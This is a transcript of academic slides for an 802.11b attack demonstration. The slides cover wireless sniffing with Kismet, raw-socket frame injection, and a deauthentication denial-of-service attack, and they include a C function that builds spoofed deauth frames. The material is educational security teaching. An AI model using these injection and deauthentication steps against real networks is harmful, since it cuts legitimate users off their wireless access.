802 11 attack demo
Download
1 / 24

802.11 Attack Demo - PowerPoint PPT Presentation


  • 131 Views
  • Uploaded on
  • Presentation posted in: General

802.11 Attack Demo. Haobo Zhou (hzhou@liacs.nl) L I A C S http://www.liacs.nl/home/hzhou. What Will Be Covered. Overview of 802.11b Wireless network sniffer Frame Injection Deauth/Disassociation Attack Attack Demo. NO!! Thanks. OK !!. Dinner??. ISO OSI Model and 802.11b.

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha

Download Presentation

802.11 Attack Demo

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -

Presentation Transcript


802.11 Attack Demo

Haobo Zhou

(hzhou@liacs.nl)

L I A C S

http://www.liacs.nl/home/hzhou


What Will Be Covered

  • Overview of 802.11b

  • Wireless network sniffer

  • Frame Injection

  • Deauth/Disassociation Attack

  • Attack Demo


NO!!

Thanks

OK

!!

Dinner??


ISO OSI Model and 802.11b

Overview of 802.11b

Obtained From http://alpha.fdu.edu/~kanoksri/IEEE80211b.html


Overview of 802.11b

  • Runs over 2.4ghz

    • DSSS - Direct Sequence Spread Spectrum

    • Channels

      • FCC (US) - 11 Channels (1-11)

      • ETSI (EU) - 13 Channels (1-13)

      • France - 4 Channels (10-13)

      • Japan - 14 Channels (1-14)

    • Uses CSMA/CA


Overview of 802.11b

  • Uses WEP for Encryption

    • “Wired Equivalent Privacy”

    • Uses RC4

    • 40-bit or 104-bit static key with 24-bit IV


Overview of 802.11b

  • Consists of 3 main protocol types

    • Management

    • Control

    • Data


Overview of 802.11b

AD Hoc


Overview of 802.11b

Infrastructure


Beacon

Authentication Req

Authentication Resp

Association Req

Association Resp

Overview of 802.11b

Node

Access Point

Access Point

Accepts Node

Node is Associated


Wireless network sniffer

wireless networking Detection

  • NIC with monitor mode support

    • why?

      • Management frame

      • Frames belongs to others

  • Tools

    • Kismet

    • others


Wireless network sniffer

Networking Interface Card Mode

  • Managed (Infrastructure)

  • Ad-Hoc(AD Hoc )

  • Monitor( Hardware support ??)

  • Master(acts as an AP)


Wireless network sniffer

  • KISMET

    • An 802.11 layer2 wireless network sniffer

    • Working on Linux

    • Ethereal/Tcpdump compatable data logging

    • Over 20 supported card types

    • Open source code


Kismet


Frame Injection

  • NIC

    • support ?

  • Device Driver

    • support frame injection?

      • Yes- very good

      • NO- Change it!

  • User program


Frame Injection

  • User program

    • C code in linux

    • RAW socket programming

      • Use PF_PACKET interface to access the link layer

      • sd=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));


Deauthentication Attack

  • Management frames can control link characteristics and physical medium properties

  • 802.11b management frames are NOT authenticated

    • Why is this bad?


Deauthentication Attack

  • Denial of Service – De-authentication

    • Use MAC address of Access Point

    • Send deauthenticate frames

      • Send continuously

    • Users are unable to reassociate with AP


Deauthentication Attack

STATE 1

Unauthenticated

Unassociated

STATE 2

Authenticated

Unassociated

Successful

authentication

Deauthentication

Disassociation

Deauthentication

Successful

Association

STATE 3

Authenticated

Associated


  • Attacker must spoof AP MAC address in Src Addr and BSSID

  • Sequence Control field handled by firmware (not set by attacker)

Deauthentication Attack

Deauth framestructure


Deauthentication Attack

  • void send_deauth (__u8 *dst, __u8 *bssid)

  • {struct {

  • struct a3_80211hdr;

  • __u16reason;

  • }mgt_frame;

  • memset(&mgt_frame, 0, sizeof(frame));

  • mgt_frame.hdr.mh_type = FC_TYPE_MGT;

  • mgt_frame.hdr.mh_subtype = MGT_DEAUTH;

  • memcpy(&(mgt_frame.hdr.mh_mac1), dst, 6);

  • memcpy(&(mgt_frame.hdr.mh_mac2), bssid, 6);

  • memcpy(&(mgt_frame.hdr.mh_mac3), bssid, 6);

  • mgt_frame.reason = 2;

  • send(socket, &frame, sizeof(mgt_frame), 0);

  • }


Question ?

deauth-attack demo continues


Hardware

Laptop

Wireless card

Atheros 5212 chip

monitor mode support

software

Device Driver

Madwifi

open source project

Two patches to enable frame injection

User program

Fata_jace.c

Hardware

Laptop

Wireless card

Software

Ping

Use ping to make sure the connection

802.11 Deauth-attack DEMO

Attacker

Victim


Thanks

  • Xu Li

  • Wei Wang

  • Google


ad
  • Login